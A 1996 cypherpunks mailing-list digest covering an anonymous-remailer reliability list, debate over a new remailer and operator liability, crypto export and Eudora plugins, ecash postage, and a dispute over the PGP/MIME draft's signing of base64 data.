Message-ID: <199605201350.GAA01121@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 20 May 96 6:47:47 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
lead     mix@zifi.genetics.utah.edu       ++++++++++++    39:10  99.99%
alpha    alias@alpha.c2.org               +++++-*-++-+  1:14:55  99.99%
exon     remailer@remailer.nl.com         +****+******     4:01  99.99%
mix      mixmaster@remail.obscura.com     +++++++++-++  2:00:18  99.99%
haystack haystack@holy.cow.net            --++*--*####    45:13  99.98%
flame    remailer@flame.alias.net         +-++++++++++  1:33:36  99.94%
vegas    remailer@vegas.gateway.com       **##**--*#*#    22:41  99.92%
portal   hfinney@shell.portal.com          ##########+     4:00  99.90%
ecafe    cpunk@remail.ecafe.org           +## ##*-####     9:39  99.89%
c2       remail@c2.org                    ++++* +-++-*  1:08:50  99.83%
amnesia  amnesia@chardos.connix.com       ---+++----+   4:41:28  99.75%
replay   remailer@replay.com              ***+**+*+***     5:18  99.65%
alumni   hal@alumni.caltech.edu           *#####*##* +     4:36  99.56%
treehole remailer@mockingbird.alias.net   +--..+---+-+  2:53:30  99.47%
penet    anon@anon.penet.fi               . __-_ -_    54:09:03  98.83%
extropia remail@miron.vip.best.com        ____-*   ..  26:11:30  80.57%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 21 May 1996 02:33:03 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960520072150.13232A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	WOW! It was apparently an exciting weekend while I was gone. I'm
sorry the shinobi remailer announced it's retirement but the exciting
thing seems to be this mysterious "middle-man" remailer. If it works as
the maintainer says, we can have a whole new avenue for setting up
undetectable remailers. Anyway, I've updated the type2.list/pubring.mix
combination on jpunix.com to reflect the retirement of shinobi and the
creation of the middle-man remailer. The lists are available by anon FTP
as well as http://www.jpunix.com. 

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaBlT1OTpEThrthvAQHpwAP+I4XqvV7PqkY2q+6cnYiPerqByfYEQa8Y
22efJIGNN4SwHFptI5Hf2sTcT03G5stFXeDbt6GkJYozHfp860Ms00LusYcZhVr2
I8YJc6SzzWqYQnorJE72aausb9f5D1R7eq+2zza0QL7JTOTGVYyA4k/r6pzhf/xU
DrQJDFjhEH0=
=fU3G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 May 1996 07:15:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605201440.HAA27297@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I like the idea about bed hopping.  But have we worried about AIDS (VIRUS)?


>Hi.
>
>Pardon my ignorance, but I had a few questions haunting me since a 
>while.
>
>Is there a way to have a remailer de-localize itself and relocalize 
>itself over the internet?
>
>For example, could there be several machines around the worlds that,
>when you send an e-mail to it, is routed to differents physical
>places of the world depending on where the actual remailer process is
>actually running?  Could there be such a thing as a virtual machine
>runing a remailer that gets to hop from physical machine to physical
>machine around the world?
>
>Just an idea to avoid jurisdiction problems.
>
>Just asking, probably quite futilely...
>
>Thanks
>
>JFA
>
> DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
> JFA Technologies, R&D consultants;  physists, technologists and engineers.
>
> PGP keys at: http://w3.citenet.net/users/jf_avon
> ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
> Unsollicited commercial e-mail will be proofread at US165 $/h
> Any sender of such material will be considered as to have ac-
> cepted the above mentionned terms.
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 21 May 1996 02:07:00 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: anonymous companies
In-Reply-To: <01I4WV3W0UHO8Y5FKU@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960520074656.29440B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 18-MAY-1996 11:16:57.48
> 
> > At 06:42 PM 5/16/96 -0700, Wei Dai wrote:
> > > Solution: smart contracts.  This is Nick Szabo's idea of building
> > > contractual obligations into cryptographic protocols so that the parties
> > > have no choice but to fullfil them.  But again we don't know whether this
> > > will actually work for this problem.
> 
> >But what happens when there are nuances or circumstances which contracts
> >do not anticipate?  This "complete" reliablity is also a curse for
> >flexibility which fast moving entities need to survive.

Careful, I didn't write any of this.

> 
> 	That's an argument for combining them with escrow agencies. If the
> escrow agency is less likely to need to intervene, then they'll charge less...
> the principle of insurance company risk estimation.
> 	-Allen
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 21 May 1996 01:59:30 +0800
To: Senator Exon <remailer@2005.bart.nl>
Subject: Re: Toastmasters?
In-Reply-To: <199605200437.GAA20138@spoof.bart.nl>
Message-ID: <Pine.SUN.3.93.960520074728.29440C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Senator Exon wrote:

> How do corporations work, in terms of liability?  If the cost of 
> incorporating isn't forbidding, I would think a remailer operator might 
> consider incorporating a company, and making the remailer a function of 
> that company.  That way, any losses are restricted to the total value of 
> the corporation; that is, nothing.  Any flaws?  There must be something 
> wrong with it somewhere.

All the corporate officers are public knowledge.
The corporate veil can pretty easily be perferated if there is a willful
attempt to avoid liability when conduct gets above a certain threshold.

This would be pretty easy to show in the event the corporation never made
dime one and never intended to.

Using corporations as a shield is, in my view, less desireable than having
blinded remailers.

> 
> Thanks.
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Tue, 21 May 1996 03:46:03 +0800
To: cypherpunks@toad.com
Subject: Re: Interactive Week exclusive - White House to launch "ClipperIII"
In-Reply-To: <adc3f6c107021004c0c4@[205.199.118.202]>
Message-ID: <v03006e02adc61cfbefc5@[206.151.234.118]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713578.multipart/signed"

--Boundary..3941.1071713578.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

>1. Will there be pressures put on the browser companies (Netscape,
>Microsoft, etc.) and the e-mail companies (Qualcomm, Microsoft, Claris,
>Lotus, etc.) to produce a "world version" that meets export standards with
>a single shrink-wrapped package?

Qualcomm has elected not to directly support PGP in the past, and it would
appear that NSA & State have broadly construed the ITAR sections on crypto
capability to mean that apps which can plug in crypto modules are
themselves not exportable (cf. Kerberos bones and the whole rationale
behind the MS CryptoAPI.)

However, Eudora 3.0 includes a plugin architecture for translators. These
translators can be used in a variety of ways, including for message
compression, foreign-language translation, and signatures. In fact, one of
the sample "translators" provided provides a "sign with PGP" icon in the
message composition window. Click it, put in your passphrase, and off you
go-- much easier than any of the existing solutions.

The plugin technology is such that it would be easy to write signature &
encryption plugins to use your choice of technology: Fortezza, Entrust,
PGP, IPG, or whatever. In fact, you might see Fortezza and Entrust plugins
later this summer :)

Several 'punks have speculated in the past about whether a general-purpose
plugin architecture that could be used for crypto would subject the product
to ITAR. Since I very seriously doubt Qualcomm would design & ship this
capability without finding out whether such an architecture would render
their product unexportable, my assumption is that (at least for now) there
is no world version requirement-- but vendors still have to face the
hassles of keeping, selling, and maintaining two separate versions. Ask
Netscape how much fun _that_ is.

-Paul


--
Paul Robichaux                    LJL Enterprises, Inc.
paul@ljl.com                      Be a cryptography user. Ask me how.



--Boundary..3941.1071713578.multipart/signed
Content-Type: application/octet-stream; name="pgp00002.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00002.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4yCgpp
UUNWQXdVQU1hQnU0UncxMVhkMzBmU3RBUUczTkFRQWlFVTFzQjNmdTBLK2c5
eXVpRFlla281OUNVVFNDRTY0CjFtWGpOU21oNlFEUStSeU5STHlDYkZ5d2Zu
bGZtNnlBNDRVci9ZVmQ5Q1ZJZG9CemNDVW9FamFKd0UxdU9VMFMKR2MxN04x
V2c2VFo0YUlBR1lNK1U3M202WjFaWUFPUDd5eEZocXRYeXhsVnB5b0FiU1Ur
cFE2UzVsdit0SDVQNApQUW9wdlZjbVg2MD0KPUpDSVEKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3941.1071713578.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 May 1996 09:17:48 +0800
To: cypherpunks@toad.com
Subject: Feds Web Crypto
Message-ID: <199605201549.IAA00569@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Washington Post, May 20, 1996
 
Feds on the Web 
 
Federal agencies' efforts to link up with the citizenry over 
the World Wide Web take a step forward today. Officials plan 
to announce a pilot program in which 1,000 to 2,000 people 
will try their hands at secure Web transactions with federal 
agencies. It's set to start later this month. 
 
The vision for the "Paperless Transactions for the Public 
Project": a taxpayer files a return to the Internal Revenue 
Service over Web links that use advanced cryptography to 
confirm to the agency that the return's really coming from the 
right party. Or, a retiree goes into a Social Security 
Administration computer to check benefit information. 
 
VIPs, civil servants and ordinary folks are to be issued 
special "key cards" to take part in the test, which will use 
cryptography from Frontier Technologies Corp., a Wisconsin 
networking company. Officials promise the vision is not that 
far away. 
 
-- 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Tue, 21 May 1996 15:22:02 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: New Remailer (hidden)
In-Reply-To: <199605200543.WAA21312@infinity.c2.org>
Message-ID: <31A09511.31855596@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> 
> Cool.  I've got a test message going now.
> Does your remailer accept PGP-encrypted email?
> It's really critical for high-security applications,
> at least for first remailer hops, but your key's not on
> the MIT keyserver.

   At present, middleman accepts only Mixmaster format messages.
Obviously, if it also supported type-1 messages, it would be important
to accept PGP encrypted messages as well.

> BTW, how do we know you're not a plant?  :-)
> Aside from having an interesting nym,
> you've probably got the first remailer that
> makes it difficult to tell who's running it.
> You could be Sameer, or you could be Louis Freeh,
> but we don't know.  At least folks like Xenon were
> known to be real people....

   I am able to vouch for the fact that middleman is not a plant.

> Even if you _are_ a plant, of course, we can still use
> your system, but I'd want to do encrypted email through
> other remailers on one end or the other.

   Always a good idea.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul.elliott@hrnowl.lonestar.org (Paul Elliott)
Date: Tue, 21 May 1996 01:12:52 +0800
Subject: PGP MIME INTERNET DRAFT considered harmful.
Message-ID: <31a0442b.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Summary: The PGP MIME INTERNET DRAFT, draft-elkins-pem-pgp-03.txt,
contains a design error with respect to signatures on binary data.


This error results from the failure to recognize the distinction between
those features of MIME which are necessary to represent complex data and
those features of MIME that are used to transport the data.

The design error will result in the following negative results if
PGP-MIME is widely used with binary data.

(1) Huge unnecessary inefficiency whenever binary data is sent signed
and encrypted.

(2) The signatures on PGP MIMEd objects can not be extracted from a MIME
context and used where MIME programs are not available.

(3) Many users will rightly refuse to sign the entities the PGP-MIME
draft envisions. This reduces the utility of PGP-MIME.

(4) If users do sign these files, they will be signing data for which
there are no commonly available inspection tools. This will eventually
result in a security breach.

- ----------------------------------------------------------------------


The problem is that when binary data is to be signed the data is to be
PGPed _after_ base64 has been applied and the MIME headers added.

This is required by the draft:
>
>3.  Content-Transfer-Encoding restrictions
>
>     Multipart/signed and multipart/encrypted are to be treated by agents
>     as opaque, meaning that the data is not to be altered in any way
>     [1].  However, many existing mail gateways will detect if the next
>     hop does not support MIME or 8-bit data and perform conversion to
>     either Quoted-Printable or Base64.  This presents serious problems
>     for multipart/signed, in particular, where the signature is
>     invalidated when such an operation occurs.  For this reason it is
>     necessary to REQUIRE that ALL data signed according to this protocol
>     be constrained to 7 bits (8-bit data should be encoded using either
>     Quoted-Printable or Base64).  Note that this also includes the case
>     where a signed object is also encrypted (see section 6).  This
>     restriction will increase the likelihood that the signature will be
>     valid upon receipt.
>
>     Data that is only to be encrypted is allowed to contain 8-bit
>     characters and therefore need not be converted to a 7-bit format.
>
>
In this the draft follows RFC1847.

[Encrypted & Signed binary data.] 
Now when there is a data path for PGP's cyphertext, PGP provides a
binary data path for its plain text. Thus, the inner base64 that PGP
MIME internet draft requires is totally unnecessary. It will cause a 30%
increase in the size of those messages that are encrypted and signed and
large amounts of CPU time will be used applying & removing the base64.

It is worth noting that huge amounts of binary data will be transferred
by MIME, so the above represents a significant problem.

[Signed binary data.]
Now let us consider the question of what PGP-MIME draft requires users
to sign. Suppose we want to send a signed .gif file to a sysop. The
sysop wants to store the .gif in his download section. Suppose the sysop
wants to store the signature as a detached signature so that people who
download it can check the authorship. But the signature proposed by the
PGP-MIME draft is useless for this purpose. It has MIME headers attached
and it has been base64'ed. People who download such a file from a BBS
have no use for it, unless they have MIME.

Or suppose we send as signed .gif file to the maintainer of a WEB page.
He stores the .gif on an insecure UNIX system connected to the internet.
Suppose, a year later the maintainer wants to check if the .gif has been
tampered with. Can the maintainer store the signature on a floppy and
use the signature for later checking? No, the only way the signatures
specified by the draft can be used, would be to add MIME headers and
apply base64. The maintainer will have to store the entire MIME message,
.gif and all if he wants to check the signature later.

Or let us consider an .gif artist. The artist has a policy of only
signing works that he can be proud of. He does not sign his sketches,
because he does not want sketches to tarnish his reputation. Before
signing and releasing a work, he examines it with several different gif
viewers and paint programs. But what does the draft PGP-MIME want the
artist to sign? It wants him to sign a file that has been base64'ed and
with mime headers added. The artist can not examine the file to be
signed with any of his gif viewers or paint programs. Everyone's mother
has told them to "Never sign anything unless you have read the fine
print first." But here we have a file that has been scrambled so that it
can not be inspected with the commonly available tools. The artist
refuses to sign. Not only does he not know what he is signing, but the
base64 offends his artistic standards. Who can be proud of base64?
Necessary perhaps, but lets face it, base64 is an horrible kludge built
to meet the deficiencies of a network.

If users get in the habit of signing binary files which represent
multimedia data, and which can not be examined with commonly available
inspection tools, it is inevitable and predictable that sooner or later
this will cause some kind of negative security event.

Now there is some justification for the way the draft handles text.
Different operating systems and machine architectures represent text in
different ways, so that it is necessary that digital signatures be taken
over some "canonical" format so that signatures will check on different
operating systems. Even after text has been mangled by Quoted-Printable 
it can still be read after a fashion by the person asked to sign it.

Operating systems and machine architectures also differ in the way they
represent binary data. The differences in the ways integers, floating
point numbers and other such thingies are represented are  well known.
However, such differences must be handled at the application level. The
location within a file of integers, floating points, etc must be set by
the application programmer/designer. PGP, MIME, and base64 can not deal
with these differences, because the location of integers and floats can
not be specified in advance for an arbitrary data file. Thus, from the
point of view of PGP and base64, these differences do not exist and
binary data may as well be a stream of bytes. Thus, in the case of
binary data, base64 is not more "canonical" than the original data.
There is no good reason to sign the base64 rather than the original
data. Once a file has been base64ed, the file can not be examined
with the usual inspection tools.

The draft has chosen to treat text and binary data similarly. This
results in negative results mentioned above, but the developer and draft
author do not have to deal with any logic to handle text and binary data
separately. User utility and security have been sacrificed for the
convenience of simplicity for the draft author and the PGP-MIME
developer.


The typical user of MIME software is not necessarily technically
sophisticated. When the deficiencies and disasters associated with
software patterned on this draft become apparent, not everyone will know
exactly which software component is at fault. The problems associated
with the draft (or its successors) may adversely affect the reputation
of PGP.

Now some descendant of the draft could become a standard or the draft
could become a de-facto standard through wide-spread  use. Such a
standard could become a barrier to the acceptance of other software
without the draft's deficiencies. Thus, the draft could permanently
inflict poor software on the world. (Look at the memory architecture of
the IBMPC for one example. Or look at the MSDOS operating system for
another example.)

The draft should be withdrawn. People should rethink and create a better
plan to combine the benefits of PGP and MIME.

It should accommodate the user who wishes to mail a generally usable PGP
signature (that is, one that can be used outside the context of MIME)
along with multimedia binary data.

It should not ask a user to apply a signature to any data that cannot be
examined with commonly available tools.

It should not require anyone to sign an artifact of a data transfer
system such as base64.

It should not require any additional space overhead  (more than that
which may be necessary for transport) when signing and encrypting.

- --
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMaBPRPBUQYbUhJh5AQH2hwP+J1ADSzD3Yx4gvUIvAwN+EDikIN2IaHhM
j+znIlt9QPzl5SSp44H+JnhoivhKR3562ACI1nexNMZ9E2MrPNioiGmrmz0uGwM6
Px/k2HbioQrgqmmP0IO/98cTZGA71pK7iNk7AZbWpEW4XfWkyRDW9hQzrCEZXXw8
jQwM/VHUPl8=
=BvoZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Tue, 21 May 1996 09:28:32 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <199605182017.WAA07561@digicash.com>
Message-ID: <199605201610.JAA03504@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605190626.BAA62897@rs5.tcs.tulane.edu>,
Matthew Carpenter  <mcarpent@mailhost.tcs.tulane.edu> wrote:
>My PDA receives
>back any coins as change if needed, and logs info about the transaction
>for my financial records.
>
>When I get back home I 'deposit' my change using the same ATM interface.
>This also removes from my home computer the copies of the coins I spent,
>and automatically updates the transaction records on my PC.
>
>So are there any flaws with above procedure?

Yup; with the current protocols, there's no way to do change.  For the shop
to pay you change, besides suddenly losing your anonymity as a payee, you
would have to go online immediately to clear the coins, which assumedly
is infeasable.

However, if you use the "fully anonymous" protocol, change becomes trivial.
You don't have to go online; the payer (the shop) does, which it assumedly
already is.  Another benefit is that coins received in this way as change
are immediately spendable by you, without having to go online in between.

The "fully anonymous" protocol turns out to be _exactly_ what is needed
for situations like this.

   - Ian "this is one of those 'pay attention' posts Sameer mentioned..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaCZaUZRiTErSPb1AQGnTgQAs/chMFt8PNJafSsgoLMOpPQgdevgbH6+
kRR/iSlj2B2kbuD0SPDa7lgvKVjjQWlaQ+AtZq/C6BFqn07/C7E23PZNY648OGpP
eT1uD3ioRDd3C4rt9hDOHd1KWdllM75zLuwLY9XO4YWeDhExwakc6/Ze9cOgfh/e
nusZy3Naanw=
=iCNw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 21 May 1996 15:05:48 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <adc3e4280c021004b7c4@[206.170.115.3]>
Message-ID: <4nq6qp$3fl@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <adc3e4280c021004b7c4@[206.170.115.3]>,
Lance Cottrell <loki@infonex.com> wrote:
>At 9:00 AM 5/18/96, Dr. Dimitri Vulis wrote:
>>"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
>>> 1. there is no economic incentive.
>>
>>So, add the code to mixmaster (and even the old style remailers) to
>>collect e-cash as it passes on the anonymous message. Then this will
>>be a good way to accumulate some e-cash, and a number of people will
>>try running remailers for this very purpose. Witness the recent
>>Usenet spam by someone advertizing a for-pay remailer.
>>
>
>I was invited to the digicash API design meeting precisely to make sure it
>could be used in remailers. It will not be using the current API. The
>problem is that Mixmaster requires exact knowledge of the size of every
>object in the message, to maintain constant message size. I could set aside
>room for one, two, three coins, but there is no guarantee that the payment
>will be made with only that many coins. The current API is going to be high
>level. It will does not allow the program to know anything about the
>internals of the payment. I need to be able to specify payment of amount X
>using no more than N coins. As soon as I have that level of control, you
>will see postage in Mixmaster.
>
>        -Lance

I mentioned this to Chaum, and he didn't really seem agree with the need for
something lower-level...

Another problem with postage in Mixmaster:  the minimum ecash payment is
$0.01.  Do we want to charge that much for email?  Need we consider
micropayments?

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaCeeUZRiTErSPb1AQE4AgP+NvB6MjqSeF74NEeakj+u+99oZwBcFHuP
ESwbu/QiRiiolU8beC341p0HL40KHdCyfx7rfQUDOIAXzGnLaoBCjVSw/DotAlAD
UuB6NI9TXhv7j5dIywOdyYAp6SU10IKDLEuA6lkQ+jg71fXteoFF0o2nTpGaPcaU
Zqv9/UZmglI=
=1Ffr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 21 May 1996 15:24:55 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605201654.JAA14790@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 AM 5/20/96 EDT, you wrote:
>	What countries are noticeable for being anti-Scientology? 
>       They would appear to be good locations for special-purpose 
>       remailer ultimate-output ends.

Scientology was illegal in Australia last time I heard.  They declared
that you could not be a religion and charge a fee for religious service
the way that Scientology charges.  They then defined them as practicing
medicine, and hit them with snake oil laws.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 21 May 1996 15:24:33 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605201654.JAA14797@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:08 AM 5/20/96 -0700, Timothy C. May wrote:
> But any country that is "anti-Scientology" is likely to be 
> repressive in various ways we would find inimical to our goals. 
> [...]
>
> (The issue of how believable the claims of CoS are is no more relevant than
> similarly outlandish claims that taking communion is eating the flesh of
> JC.)

The Australian law is (or was) based on the idea that if you charged someone
$2500 for eating the flesh of christ, it then becomes legitimate for the
government to check out whether or not the customer was getting actual 
flesh of Christ.  This seems to me a lot less repressive than the American
FDA.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: elkins@aero.org (Michael Elkins)
Date: Tue, 21 May 1996 15:05:27 +0800
To: pgp-mime@purpletape.cs.uchicago.edu
Subject: Re: PGP MIME INTERNET DRAFT considered harmful.
In-Reply-To: <832582505snx@hrnowl.lonestar.org>
Message-ID: <199605201710.KAA23072@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Note: CC'd to the pgp-mime list.]

Paul Elliott writes:
> [Encrypted & Signed binary data.] 
> Now when there is a data path for PGP's cyphertext, PGP provides a
> binary data path for its plain text. Thus, the inner base64 that PGP
> MIME internet draft requires is totally unnecessary. It will cause a 30%
> increase in the size of those messages that are encrypted and signed and
> large amounts of CPU time will be used applying & removing the base64.

This design decision actually serves a purpose.  The scenario is as
follows:  Suppose you are a company which has west-coast and east-coast
offices, and the only connectivity which exists is via the open Internet.
Suppose further that you wished to send out a company memorandum to all
the employees.  Obviously you will want to sign and encrypt your message.
However, one it reaches your offices, you would like to have the encryption
"layer" stripped leaving just the signed message.  Now, if when you generated
that message you did not restrict yourself to 7 bits, there is a likely
probability given todays software, that you are not going to be able to
transmit that message over an SMTP framework.

Now, this does present some bloat for people who do not strip the encryption,
but it seems far better to design the protocol such that this case will
work.

> [Signed binary data.]
> Now let us consider the question of what PGP-MIME draft requires users
> to sign. Suppose we want to send a signed .gif file to a sysop. The
> sysop wants to store the .gif in his download section. Suppose the sysop
> wants to store the signature as a detached signature so that people who
> download it can check the authorship. But the signature proposed by the
> PGP-MIME draft is useless for this purpose. It has MIME headers attached
> and it has been base64'ed. People who download such a file from a BBS
> have no use for it, unless they have MIME.

[...several other examples deleted...]

PGP/MIME is _not_ meant to be used in this fashion!  It never was!  PGP/MIME
is only to be used for transport, not for long term storage.  If you need
a persistent signature, you should generate a detached signature as an
attachment.

> If users get in the habit of signing binary files which represent
